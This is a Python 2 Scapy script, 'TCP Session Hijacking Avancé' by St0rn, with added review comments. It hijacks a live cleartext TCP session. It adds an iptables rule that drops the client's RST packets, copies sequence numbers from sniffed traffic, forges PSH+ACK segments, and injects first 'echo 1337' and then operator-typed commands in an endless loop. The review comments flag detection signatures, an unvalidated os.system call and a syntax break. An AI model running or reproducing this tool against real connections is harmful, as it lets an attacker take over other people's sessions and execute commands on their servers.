TCP Session Hijacking Avancé

# ANBU :: TCP Session Hijacking Module
# Author: St0rn
#
# argv[1] = ip_client ; argv[2] = ip_serveur ; argv[3] =
# port_serveur ; argv[4] = iface
#
# Bug: to keep the connection alive, the function retrieves a single
# packet; if the request produces output that is too long
# (fragmented packets), the rest is displayed on the next loop
# => To be fixed in the next version
# 
#!usr/bin/env/python
     
from scapy.all import *
import sys
import os
     
"""Filtre"""
# BPF capture filter built from argv: packets addressed to argv[1], coming
# from argv[2] with source port argv[3], that have the TCP PSH flag set.
# NOTE(review): the argv values are concatenated unvalidated, both here and
# into the shell command below.
filtre = "dst host " + sys.argv[1] + " and src host " + sys.argv[2] + " and src port " + sys.argv[3] + " and tcp[tcpflags] & tcp-push != 0"
     
os.system("clear")
     
# Appends a rule to the local OUTPUT chain that drops TCP packets with the
# RST flag set whose source address is argv[1].
# NOTE(review): the command is assembled by string concatenation and run
# through a shell, so shell metacharacters in argv[1] would be interpreted.
# The rule is appended with -A and nothing in this listing deletes it, so it
# stays in place after the script ends; an unexplained rule of this shape in
# OUTPUT is a host artefact worth checking during incident response.
try:
 os.system("iptables -A OUTPUT -p tcp --tcp-flags RST RST -s " + sys.argv[1] + " -j DROP")
 # NOTE(review): os.system() reports failure through its return value, not
 # an exception, so this success message is printed even when iptables
 # fails (the return value is never checked).
 print("\n [+] iptables rule added for client RST packets\n")
except:
 print("\n [-] iptables rule don't added for client RST packets\n")
     
"""Fonction de vol de session"""
def hijack_session(p):
 """Sniff callback: answer the captured packet p with one forged segment.

 The reply swaps the Ethernet, IP and TCP endpoints of p, copies most of
 its other header fields, and carries a fixed text payload. Nothing is
 returned; the frame is emitted with sendp().
 """
 print("\n")
     
 
 # Layer 2 and layer 3 addresses are those of p, reversed.
 ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
 # Every forged packet carries the constant IP id 1337; the remaining IP
 # fields are copied from p. A fixed IP ID like this is a simple signature
 # for network monitoring to match on.
 ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
 # Ports are reversed, seq/ack are taken from p's ack/seq, and the flags are
 # forced to PSH+ACK. The values come straight from an observed packet, so
 # the technique depends on the sniffing host seeing the live traffic.
 tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
     
 # The payload is plain text terminated by a newline.
 # NOTE(review): presumably aimed at a cleartext, line-based service; a
 # session protected by TLS or SSH would not accept raw injected bytes --
 # confirm against the intended lab setup.
 hijack = ether/ip/tcp/"echo 1337\n"
 sendp(hijack)
 
"""Fonction pour garder la connexion"""    
def perm_session(p):
 """Sniff callback: show the payload of p, then send one operator-typed line.

 Handles a single captured packet per call, which is the limitation the
 author describes in the file header. The reply is built the same way as
 in hijack_session, with the typed line plus a newline as payload.
 Nothing is returned.
 """
 os.system("clear")
 # NOTE(review): the print on the next line has lost its indentation under
 # this `if` in the listing; as shown it is a syntax error -- presumably it
 # was the body of the `if`.
 if p[Raw].load:
 print(p[Raw].load)
     
 # raw_input() exists only in Python 2; the call blocks until the operator
 # enters a line.
 cmd = raw_input("\n> ")
     
 # Same header construction as hijack_session: endpoints reversed, seq/ack
 # taken from p's ack/seq, flags PSH+ACK, and the constant IP id 1337.
 ether = Ether(dst=p[Ether].src, src=p[Ether].dst)
 ip = IP(src=p[IP].dst, dst=p[IP].src, ihl=p[IP].ihl, flags=p[IP].flags, frag=p[IP].frag, ttl=p[IP].ttl,     proto=p[IP].proto, id=1337)
 tcp = TCP(sport=p[TCP].dport, dport=p[TCP].sport, seq=p[TCP].ack, ack=p[TCP].seq, dataofs=p[TCP].dataofs, reserved=p[TCP].reserved, flags="PA", window=p[TCP].window, options=p[TCP].options)
     
 packet = ether/ip/tcp/(cmd+"\n")
 sendp(packet)
     
     
 # Status line printed after each send; in this listing it is indented as
 # part of the function body.
 print(" [*] Hunting TCP Session " + sys.argv[1] + " => " + sys.argv[2] + ":"+ sys.argv[3]+"\n")
   
"""Main"""  
# First capture: wait for one packet that matches the BPF filter (and has a
# TCP layer) on interface argv[4], then pass it to hijack_session.
# NOTE(review): `lambda(f) :` is Python 2-only parameter syntax, so this
# listing does not parse under Python 3.
# NOTE(review): the bare except replaces every failure (missing argument,
# insufficient privileges, unknown interface) with one generic message, and
# execution continues into the loop below regardless.
try:
 sniff(count = 1, prn=hijack_session, filter=filtre, lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
except:
 print(" [-] Can't launch sniffer :'(\n")
     
# Endless loop: each pass captures one more matching packet and runs
# perm_session on it. There is no exit condition, and the iptables rule
# added earlier in the script is never removed.
while 1:
 try:
  sniff(count = 1, prn=perm_session, filter=filtre,  lfilter = lambda(f) : f.haslayer(TCP), store=0, iface=sys.argv[4])
 except:
  print(" [-] Can't launch sniffer :'(\n")

St0rn

